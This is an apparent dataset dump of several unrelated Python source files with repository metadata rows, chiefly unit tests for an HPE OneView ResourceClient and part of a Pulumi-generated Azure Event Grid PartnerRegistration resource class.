mock_patch.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={'Accept-Language': 'en_US'})
@mock.patch.object(connection, 'patch')
def test_patch_with_custom_headers_v300(self, mock_patch):
mock_patch.return_value = {}, {}
resource_client = ResourceClient(self.connection, self.URI)
resource_client.patch('/rest/testuri/123', 'operation', '/field', 'value',
custom_headers=self.custom_headers)
mock_patch.assert_called_once_with(mock.ANY,
mock.ANY,
custom_headers={'Accept-Language': 'en_US',
'Content-Type': 'application/json-patch+json'})
@mock.patch.object(connection, 'patch')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_patch_return_entity(self, mock_wait4task, mock_patch):
entity = {"resource_id": "123a53cz"}
mock_patch.return_value = self.task, self.task
mock_wait4task.return_value = entity
result = self.resource_client.patch(
'123a53cz', 'replace', '/name', 'new_name', -1)
self.assertEqual(result, entity)
@mock.patch.object(connection, 'patch')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_patch_request_custom_headers_with_content_type(self, mock_task, mock_patch):
dict_info = {"resource_name": "a name"}
mock_patch.return_value = {}, {}
headers = {'Content-Type': 'application/json',
'Extra': 'extra'}
self.connection._apiVersion = 300
resource_client = ResourceClient(self.connection, self.URI)
resource_client.patch_request('/rest/testuri/id', body=dict_info, custom_headers=headers)
mock_patch.assert_called_once_with('/rest/testuri/id', dict_info, custom_headers=headers)
@mock.patch.object(connection, 'patch')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_patch_request_custom_headers(self, mock_task, mock_patch):
dict_info = {"resource_name": "a name"}
mock_patch.return_value = {}, {}
headers = {'Extra': 'extra'}
self.connection._apiVersion = 300
resource_client = ResourceClient(self.connection, self.URI)
resource_client.patch_request('/rest/testuri/id', body=dict_info, custom_headers=headers)
mock_patch.assert_called_once_with(
'/rest/testuri/id',
dict_info,
custom_headers={'Extra': 'extra',
'Content-Type': 'application/json-patch+json'})
@mock.patch.object(connection, 'patch')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_wait_for_activity_on_patch(self, mock_wait4task, mock_patch):
entity = {"resource_id": "123a53cz"}
mock_patch.return_value = self.task, self.task
mock_wait4task.return_value = entity
self.resource_client.patch(
'123a53cz', 'replace', '/name', 'new_name', -1)
mock_wait4task.assert_called_once_with(self.task, mock.ANY)
def test_delete_with_none(self):
try:
self.resource_client.delete(None)
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
@mock.patch.object(connection, 'delete')
def test_delete_with_dict_uri(self, mock_delete):
resource = {"uri": "uri"}
mock_delete.return_value = {}, {}
delete_result = self.resource_client.delete(resource)
self.assertTrue(delete_result)
mock_delete.assert_called_once_with("uri", custom_headers=None)
def test_delete_with_empty_dict(self):
try:
self.resource_client.delete({})
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
def test_get_with_none(self):
try:
self.resource_client.get(None)
except ValueError as e:
self.assertTrue("id" in e.args[0])
else:
self.fail()
def test_get_collection_with_none(self):
try:
self.resource_client.get_collection(None)
except ValueError as e:
self.assertTrue("id" in e.args[0])
else:
self.fail()
def test_create_with_none(self):
try:
self.resource_client.create(None)
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
def test_create_with_empty_dict(self):
try:
self.resource_client.create({})
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
def test_update_with_none(self):
try:
self.resource_client.update(None)
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
def test_update_with_empty_dict(self):
try:
self.resource_client.update({})
except ValueError as e:
self.assertTrue("Resource" in e.args[0])
else:
self.fail()
def test_get_by_with_name_none(self):
try:
self.resource_client.get_by(None, None)
except ValueError as e:
self.assertTrue("field" in e.args[0])
else:
self.fail()
@mock.patch.object(connection, 'get')
def test_get_with_uri_should_work(self, mock_get):
mock_get.return_value = {}
uri = self.URI + "/ad28cf21-8b15-4f92-bdcf-51cb2042db32"
self.resource_client.get(uri)
mock_get.assert_called_once_with(uri)
def test_get_with_uri_with_incompatible_url_shoud_fail(self):
message = "Unrecognized URI for this resource"
uri = "/rest/interconnects/ad28cf21-8b15-4f92-bdcf-51cb2042db32"
try:
self.resource_client.get(uri)
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(message, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_get_with_uri_from_another_resource_with_incompatible_url_shoud_fail(self):
message = "Unrecognized URI for this resource"
uri = "/rest/interconnects/ad28cf21-8b15-4f92-bdcf-51cb2042db32"
fake_resource = FakeResource(None)
try:
fake_resource.get_fake(uri)
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(message, exception.args[0])
else:
self.fail("Expected Exception was not raised")
@mock.patch.object(connection, 'get')
def test_get_utilization_with_args(self, mock_get):
self.resource_client.get_utilization('09USE7335NW3', fields='AmbientTemperature,AveragePower,PeakPower',
filter='startDate=2016-05-30T03:29:42.361Z',
refresh=True, view='day')
expected_uri = '/rest/testuri/09USE7335NW3/utilization' \
'?filter=startDate%3D2016-05-30T03%3A29%3A42.361Z' \
'&fields=AmbientTemperature%2CAveragePower%2CPeakPower' \
'&refresh=true' \
'&view=day'
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(connection, 'get')
def test_get_utilization_with_multiple_filters(self, mock_get):
self.resource_client.get_utilization(
'09USE7335NW3',
fields='AmbientTemperature,AveragePower,PeakPower',
filter=['startDate=2016-05-30T03:29:42.361Z',
'endDate=2016-05-31T03:29:42.361Z'],
refresh=True,
view='day')
expected_uri = '/rest/testuri/09USE7335NW3/utilization' \
'?filter=startDate%3D2016-05-30T03%3A29%3A42.361Z' \
'&filter=endDate%3D2016-05-31T03%3A29%3A42.361Z' \
'&fields=AmbientTemperature%2CAveragePower%2CPeakPower' \
'&refresh=true' \
'&view=day'
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(connection, 'get')
def test_get_utilization_by_id_with_defaults(self, mock_get):
self.resource_client.get_utilization('09USE7335NW3')
expected_uri = '/rest/testuri/09USE7335NW3/utilization'
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(connection, 'get')
def test_get_utilization_by_uri_with_defaults(self, mock_get):
self.resource_client.get_utilization('/rest/testuri/09USE7335NW3')
expected_uri = '/rest/testuri/09USE7335NW3/utilization'
mock_get.assert_called_once_with(expected_uri)
def test_get_utilization_with_empty(self):
try:
self.resource_client.get_utilization('')
except ValueError as exception:
self.assertEqual(RESOURCE_CLIENT_INVALID_ID, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_id_should_work(self):
input = '09USE7335NW35'
expected_output = '/rest/testuri/09USE7335NW35'
result = self.resource_client.build_uri(input)
self.assertEqual(expected_output, result)
def test_build_uri_with_uri_should_work(self):
input = '/rest/testuri/09USE7335NW3'
expected_output = '/rest/testuri/09USE7335NW3'
result = self.resource_client.build_uri(input)
self.assertEqual(expected_output, result)
def test_build_uri_with_none_should_raise_exception(self):
try:
self.resource_client.build_uri(None)
except ValueError as exception:
self.assertEqual(RESOURCE_CLIENT_INVALID_ID, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_empty_str_should_raise_exception(self):
try:
self.resource_client.build_uri('')
except ValueError as exception:
self.assertEqual(RESOURCE_CLIENT_INVALID_ID, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_different_resource_uri_should_raise_exception(self):
try:
self.resource_client.build_uri(
'/rest/test/another/resource/uri/09USE7335NW3')
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(UNRECOGNIZED_URI, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_uri_with_incomplete_uri_should_raise_exception(self):
try:
self.resource_client.build_uri('/rest/')
except exceptions.HPOneViewUnknownType as exception:
self.assertEqual(UNRECOGNIZED_URI, exception.args[0])
else:
self.fail("Expected Exception was not raised")
def test_build_subresource_uri(self):
options = [
dict(
resource='1',
subresource='2',
path='sub',
uri='/rest/testuri/1/sub/2'),
dict(
resource='/rest/testuri/3',
subresource='4',
path='sub',
uri='/rest/testuri/3/sub/4'),
dict(
resource='5',
subresource='/rest/testuri/5/sub/6',
path='sub',
uri='/rest/testuri/5/sub/6'),
dict(
resource='/rest/testuri/7',
subresource='/rest/testuri/7/sub/8',
path='sub',
uri='/rest/testuri/7/sub/8'),
dict(
resource=None,
subresource='/rest/testuri/9/sub/10',
path='sub',
uri='/rest/testuri/9/sub/10'),
dict(
resource='/rest/testuri/11',
subresource='12',
path='/sub/',
uri='/rest/testuri/11/sub/12'),
dict(
resource='/rest/testuri/13',
subresource=None,
path='/sub/',
uri='/rest/testuri/13/sub'),
]
for option in options:
uri = self.resource_client.build_subresource_uri(option['resource'], option['subresource'], option['path'])
self.assertEqual(uri, option['uri'])
def test_build_subresource_uri_with_subresourceid_and_without_resource_should_fail(self):
try:
self.resource_client.build_subresource_uri(None, "123456", 'sub-path')
except exceptions.HPOneViewValueError as exception:
self.assertEqual(RESOURCE_ID_OR_URI_REQUIRED, exception.args[0])
else:
self.fail("Expected Exception was not raised")
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_create_report_should_do_post_request(self, mock_get_completed_task, mock_post):
task_with_output = self.task.copy()
task_with_output['taskOutput'] = []
mock_post.return_value = self.task, {}
mock_get_completed_task.return_value = task_with_output
self.resource_client.create_report("/rest/path/create-report")
mock_post.assert_called_once_with("/rest/path/create-report", {})
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_create_report_should_wait_task_completion(self, mock_get_completed_task, mock_post):
task_with_output = self.task.copy()
task_with_output['taskOutput'] = []
mock_post.return_value = self.task, {}
mock_get_completed_task.return_value = task_with_output
self.resource_client.create_report("/rest/path/create-report", timeout=60)
mock_get_completed_task.assert_called_once_with(self.task, 60)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_create_report_should_return_output_list_when_results(self, mock_get_completed_task, mock_post):
task_output = [
{"type": "FCIssueResponseV2", "created": "2015-03-24T15: 32: 50.889Z"},
{"type": "FCIssueResponseV2", "created": "2015-03-13T14: 10: 50.322Z"}
]
task_with_output = self.task.copy()
task_with_output['taskOutput'] = task_output
mock_post.return_value = self.task, {}
mock_get_completed_task.return_value = task_with_output
result = self.resource_client.create_report("/rest/path/create-report")
self.assertEqual(result, task_output)
@mock.patch.object(connection, 'post')
@mock.patch.object(TaskMonitor, 'get_completed_task')
def test_create_report_should_return_empty_list_when_output_is_empty(self, mock_get_completed_task, mock_post):
task_with_output = self.task.copy()
task_with_output['taskOutput'] = []
mock_post.return_value = self.task, {}
mock_get_completed_task.return_value = task_with_output
result = self.resource_client.create_report("/rest/path/create-report")
self.assertEqual(result, [])
@mock.patch.object(connection, 'post')
def test_create_report_should_raise_exception_when_not_task(self, mock_post):
task_with_output = self.task.copy()
task_with_output['taskOutput'] = []
mock_post.return_value = None, {}
try:
self.resource_client.create_report("/rest/path/create-report")
except exceptions.HPOneViewException as exception:
self.assertEqual(RESOURCE_CLIENT_TASK_EXPECTED, exception.args[0])
else:
self.fail("Expected Exception was not raised")
@mock.patch.object(connection, 'post')
def test_create_when_the_resource_is_a_list(self, mock_post):
dict_to_create = [{"resource_name": "a name"}]
mock_post.return_value = {}, {}
resource_client = ResourceClient(self.connection, self.URI)
resource_client.create(dict_to_create, timeout=-1)
mock_post.assert_called_once_with(self.URI, dict_to_create, custom_headers=None)
def test_merge_api_default_values(self):
resource = {'name': 'resource1'}
default_values = {
'200': {"type": "EnclosureGroupV200"},
'300': {"type": "EnclosureGroupV300"}
}
expected = {'name': 'resource1', "type": "EnclosureGroupV300"}
resource_client = ResourceClient(self.connection, self.URI)
result = resource_client.merge_default_values(resource, default_values)
self.assertEqual(result, expected)
def test_should_not_merge_when_default_values_not_defined(self):
resource = {'name': 'resource1'}
default_values = {}
expected = {'name': 'resource1'}
resource_client = ResourceClient(self.connection, self.URI)
result = resource_client.merge_default_values(resource, default_values)
self.assertEqual(result, expected)
@mock.patch.object(connection, 'post_multipart_with_response_handling')
def test_upload_should_call_post_multipart(self, mock_post_multipart):
uri = '/rest/testuri/'
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_post_multipart.assert_called_once_with(uri, filepath, 'SPPgen9snap6.2015_0405.81.iso')
@mock.patch.object(connection, 'post_multipart_with_response_handling')
def test_upload_should_call_post_multipart_with_resource_uri_when_not_uri_provided(self, mock_post_multipart):
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath)
mock_post_multipart.assert_called_once_with('/rest/testuri', mock.ANY, mock.ANY)
@mock.patch.object(connection, 'post_multipart_with_response_handling')
@mock.patch.object(TaskMonitor, 'wait_for_task')
@mock.patch.object(connection, 'get')
def test_upload_should_wait_for_task_when_response_is_task(self, mock_get, mock_wait4task, mock_post_multipart):
uri = '/rest/testuri/'
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = self.task, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_wait4task.assert_called_once_with(self.task, -1)
@mock.patch.object(connection, 'post_multipart_with_response_handling')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_upload_should_not_wait_for_task_when_response_is_not_task(self, mock_wait4task, mock_post_multipart):
uri = '/rest/testuri/'
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_wait4task.not_been_called()
@mock.patch.object(connection, 'post_multipart_with_response_handling')
@mock.patch.object(TaskMonitor, 'wait_for_task')
@mock.patch.object(connection, 'get')
def test_upload_should_return_associated_resource_when_response_is_task(self, mock_get, mock_wait4task,
mock_post_multipart):
fake_associated_resurce = mock.Mock()
uri = '/rest/testuri/'
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = self.task, mock.Mock()
mock_wait4task.return_value = fake_associated_resurce
result = self.resource_client.upload(filepath, uri)
self.assertEqual(result, fake_associated_resurce)
@mock.patch.object(connection, 'post_multipart_with_response_handling')
@mock.patch.object(TaskMonitor, 'wait_for_task')
def test_upload_should_return_resource_when_response_is_not_task(self, mock_wait4task, mock_post_multipart):
fake_response_body = mock.Mock()
uri = '/rest/testuri/'
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, fake_response_body
result = self.resource_client.upload(filepath, uri)
self.assertEqual(result, fake_response_body)
@mock.patch.object(connection, 'download_to_stream')
@mock.patch(mock_builtin('open'))
def test_download_should_call_download_to_stream_with_given_uri(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = '/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315'
mock_open.return_value = io.StringIO()
self.resource_client.download(uri, file_path)
mock_download_to_stream.assert_called_once_with(mock.ANY, uri, custom_headers=mock.ANY)
@mock.patch.object(connection, 'download_to_stream')
@mock.patch(mock_builtin('open'))
def test_download_should_call_download_to_stream_with_open_file(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = '/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315'
fake_file = io.StringIO()
mock_open.return_value = fake_file
self.resource_client.download(uri, file_path)
mock_open.assert_called_once_with(file_path, 'wb')
mock_download_to_stream.assert_called_once_with(fake_file, uri, custom_headers=mock.ANY)
@mock.patch.object(connection, 'download_to_stream')
@mock.patch(mock_builtin('open'))
def test_download_should_return_true_when_success(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = '/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315'
mock_download_to_stream.return_value = True
mock_open.return_value = io.StringIO()
result = self.resource_client.download(uri, file_path)
self.assertTrue(result)
@mock.patch.object(connection, 'download_to_stream')
@mock.patch(mock_builtin('open'))
def test_download_should_return_false_when_error(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = '/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315'
mock_download_to_stream.return_value = False
mock_open.return_value = io.StringIO()
result = self.resource_client.download(uri, file_path)
self.assertFalse(result)
def test_transform_list_to_dict(self):
list = ['one', 'two', {'tree': 3}, 'four', 5]
dict_transformed = transform_list_to_dict(list=list)
self.assertEqual(dict_transformed,
{'5': True,
'four': True,
'one': True,
'tree': 3,
'two': True})
def test_extract_id_from_uri(self):
uri = '/rest/plan-scripts/3518be0e-17c1-4189-8f81-83f3724f6155'
id = '3518be0e-17c1-4189-8f81-83f3724f6155'
extracted_id = extract_id_from_uri(uri)
self.assertEqual(id, extracted_id)
def test_extract_id_from_uri_with_extra_slash(self):
uri = '/rest/plan-scripts/3518be0e-17c1-4189-8f81-83f3724f6155/'
extracted_id = extract_id_from_uri(uri)
self.assertEqual(extracted_id, '')
def test_extract_id_from_uri_passing_id(self):
uri = '3518be0e-17c1-4189-8f81-83f3724f6155'
extracted_id = extract_id_from_uri(uri)
self.assertEqual(extracted_id, '3518be0e-17c1-4189-8f81-83f3724f6155')
def test_extract_id_from_uri_unsupported(self):
# This example is not supported yet
uri = '/rest/plan-scripts/3518be0e-17c1-4189-8f81-83f3724f6155/otherthing'
extracted_id = extract_id_from_uri(uri)
self.assertEqual(extracted_id, 'otherthing')
| 42.21117 | 127 | 0.665727 | 12,650 | 103,544 | 5.131146 | 0.037866 | 0.042845 | 0.058004 | 0.061625 | 0.921829 | 0.904235 | 0.885286 | 0.867969 | 0.849158 | 0.832812 | 0 | 0.026513 | 0.211002 | 103,544 | 2,452 | 128 | 42.228385 | 0.768006 | 0.011512 | 0 | 0.695062 | 0 | 0.011394 | 0.155244 | 0.065934 | 0 | 0 | 0 | 0 | 0.124254 | 1 | 0.119913 | false | 0.000543 | 0.004341 | 0.000543 | 0.137819 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
538700fd5d58b1e117fad14517de686aecad4c56
| 171 |
py
|
Python
|
leaf/rbac/model/__init__.py
|
guiqiqi/leaf
|
79e34f4b8fba8c6fd208b5a3049103dca2064ab5
|
[
"Apache-2.0"
] | 119 |
2020-01-30T04:25:03.000Z
|
2022-03-27T07:15:45.000Z
|
leaf/rbac/model/__init__.py
|
guiqiqi/leaf
|
79e34f4b8fba8c6fd208b5a3049103dca2064ab5
|
[
"Apache-2.0"
] | 8 |
2020-02-02T05:49:47.000Z
|
2021-01-25T03:31:09.000Z
|
leaf/rbac/model/__init__.py
|
guiqiqi/leaf
|
79e34f4b8fba8c6fd208b5a3049103dca2064ab5
|
[
"Apache-2.0"
] | 11 |
2020-01-31T15:07:11.000Z
|
2021-03-24T03:47:48.000Z
|
"""用户, 组, 及相关认证数据库模型"""
from .group import Group
from .user import User
from .user import UserIndex
from .auth import Authentication
from .accesspoint import AccessPoint
| 21.375 | 36 | 0.783626 | 23 | 171 | 5.826087 | 0.478261 | 0.119403 | 0.208955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140351 | 171 | 7 | 37 | 24.428571 | 0.911565 | 0.099415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
53971f3415b6410a3e353dbb14eb4ceab3a8c1a1
| 30 |
py
|
Python
|
griddy/__init__.py
|
pgolding/pandas-grid
|
0f80db1511097656496dee503d7bb281b97b8bdc
|
[
"BSD-2-Clause"
] | 1 |
2018-01-03T11:34:08.000Z
|
2018-01-03T11:34:08.000Z
|
griddy/__init__.py
|
pgolding/pandas-grid
|
0f80db1511097656496dee503d7bb281b97b8bdc
|
[
"BSD-2-Clause"
] | null | null | null |
griddy/__init__.py
|
pgolding/pandas-grid
|
0f80db1511097656496dee503d7bb281b97b8bdc
|
[
"BSD-2-Clause"
] | null | null | null |
from .grid import render_table
| 30 | 30 | 0.866667 | 5 | 30 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 30 | 1 | 30 | 30 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
53c2457c0d1c8b05d10bdccfca2b07b59c9a6dd9
| 57 |
py
|
Python
|
scripts/selectors.py
|
bartongroup/slivka-bio
|
049aee943503963ce5c9b14267fe001edd8e0125
|
[
"Apache-2.0"
] | null | null | null |
scripts/selectors.py
|
bartongroup/slivka-bio
|
049aee943503963ce5c9b14267fe001edd8e0125
|
[
"Apache-2.0"
] | 3 |
2021-09-01T16:47:02.000Z
|
2022-02-09T09:01:31.000Z
|
scripts/selectors.py
|
bartongroup/slivka-bio
|
049aee943503963ce5c9b14267fe001edd8e0125
|
[
"Apache-2.0"
] | null | null | null |
def example_selector(*args, **kwargs): return "default"
| 19 | 55 | 0.736842 | 7 | 57 | 5.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 57 | 2 | 56 | 28.5 | 0.803922 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | true | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 |
0
| 6 |
0709b6cd82b1f84edf49917175e51ec7e1ae9747
| 264 |
py
|
Python
|
practice/src/design_pattern/TemplateMethod.py
|
t10471/python
|
75056454bfb49197eb44f6b4d6a1b0a0b4b408ec
|
[
"MIT"
] | null | null | null |
practice/src/design_pattern/TemplateMethod.py
|
t10471/python
|
75056454bfb49197eb44f6b4d6a1b0a0b4b408ec
|
[
"MIT"
] | null | null | null |
practice/src/design_pattern/TemplateMethod.py
|
t10471/python
|
75056454bfb49197eb44f6b4d6a1b0a0b4b408ec
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#単なる継承
class Base(object):
def __init__(self):
pass
def meth(self, int):
return self._meth(int)
def _meth(self, int):
return int
class Pow(Base):
def _meth(self, int):
return pow(int,int)
| 15.529412 | 30 | 0.556818 | 36 | 264 | 3.888889 | 0.416667 | 0.15 | 0.235714 | 0.3 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005435 | 0.30303 | 264 | 16 | 31 | 16.5 | 0.755435 | 0.098485 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.1 | 0 | 0.3 | 0.9 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 |
0
| 6 |
071028fc162506887f63334754f84e376a76520e
| 31,879 |
py
|
Python
|
sdk/python/pulumi_azure_native/eventgrid/partner_registration.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/eventgrid/partner_registration.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/eventgrid/partner_registration.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
__all__ = ['PartnerRegistrationArgs', 'PartnerRegistration']
@pulumi.input_type
class PartnerRegistrationArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
authorized_azure_subscription_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
customer_service_uri: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
logo_uri: Optional[pulumi.Input[str]] = None,
long_description: Optional[pulumi.Input[str]] = None,
partner_customer_service_extension: Optional[pulumi.Input[str]] = None,
partner_customer_service_number: Optional[pulumi.Input[str]] = None,
partner_name: Optional[pulumi.Input[str]] = None,
partner_registration_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_description: Optional[pulumi.Input[str]] = None,
partner_resource_type_display_name: Optional[pulumi.Input[str]] = None,
partner_resource_type_name: Optional[pulumi.Input[str]] = None,
setup_uri: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility_state: Optional[pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']]] = None):
"""
The set of arguments for constructing a PartnerRegistration resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group within the user's subscription.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_azure_subscription_ids: List of Azure subscription Ids that are authorized to create a partner namespace
associated with this partner registration. This is an optional property. Creating
partner namespaces is always permitted under the same Azure subscription as the one used
for creating the partner registration.
:param pulumi.Input[str] customer_service_uri: The extension of the customer service URI of the publisher.
:param pulumi.Input[str] location: Location of the resource.
:param pulumi.Input[str] logo_uri: URI of the logo.
:param pulumi.Input[str] long_description: Long description for the custom scenarios and integration to be displayed in the portal if needed.
Length of this description should not exceed 2048 characters.
:param pulumi.Input[str] partner_customer_service_extension: The extension of the customer service number of the publisher. Only digits are allowed and number of digits should not exceed 10.
:param pulumi.Input[str] partner_customer_service_number: The customer service number of the publisher. The expected phone format should start with a '+' sign
followed by the country code. The remaining digits are then followed. Only digits and spaces are allowed and its
length cannot exceed 16 digits including country code. Examples of valid phone numbers are: +1 515 123 4567 and
+966 7 5115 2471. Examples of invalid phone numbers are: +1 (515) 123-4567, 1 515 123 4567 and +966 121 5115 24 7 551 1234 43
:param pulumi.Input[str] partner_name: Official name of the partner name. For example: "Contoso".
:param pulumi.Input[str] partner_registration_name: Name of the partner registration.
:param pulumi.Input[str] partner_resource_type_description: Short description of the partner resource type. The length of this description should not exceed 256 characters.
:param pulumi.Input[str] partner_resource_type_display_name: Display name of the partner resource type.
:param pulumi.Input[str] partner_resource_type_name: Name of the partner resource type.
:param pulumi.Input[str] setup_uri: URI of the partner website that can be used by Azure customers to setup Event Grid
integration on an event source.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Tags of the resource.
:param pulumi.Input[Union[str, 'PartnerRegistrationVisibilityState']] visibility_state: Visibility state of the partner registration.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if authorized_azure_subscription_ids is not None:
pulumi.set(__self__, "authorized_azure_subscription_ids", authorized_azure_subscription_ids)
if customer_service_uri is not None:
pulumi.set(__self__, "customer_service_uri", customer_service_uri)
if location is not None:
pulumi.set(__self__, "location", location)
if logo_uri is not None:
pulumi.set(__self__, "logo_uri", logo_uri)
if long_description is not None:
pulumi.set(__self__, "long_description", long_description)
if partner_customer_service_extension is not None:
pulumi.set(__self__, "partner_customer_service_extension", partner_customer_service_extension)
if partner_customer_service_number is not None:
pulumi.set(__self__, "partner_customer_service_number", partner_customer_service_number)
if partner_name is not None:
pulumi.set(__self__, "partner_name", partner_name)
if partner_registration_name is not None:
pulumi.set(__self__, "partner_registration_name", partner_registration_name)
if partner_resource_type_description is not None:
pulumi.set(__self__, "partner_resource_type_description", partner_resource_type_description)
if partner_resource_type_display_name is not None:
pulumi.set(__self__, "partner_resource_type_display_name", partner_resource_type_display_name)
if partner_resource_type_name is not None:
pulumi.set(__self__, "partner_resource_type_name", partner_resource_type_name)
if setup_uri is not None:
pulumi.set(__self__, "setup_uri", setup_uri)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if visibility_state is not None:
pulumi.set(__self__, "visibility_state", visibility_state)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group within the user's subscription.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="authorizedAzureSubscriptionIds")
def authorized_azure_subscription_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of Azure subscription Ids that are authorized to create a partner namespace
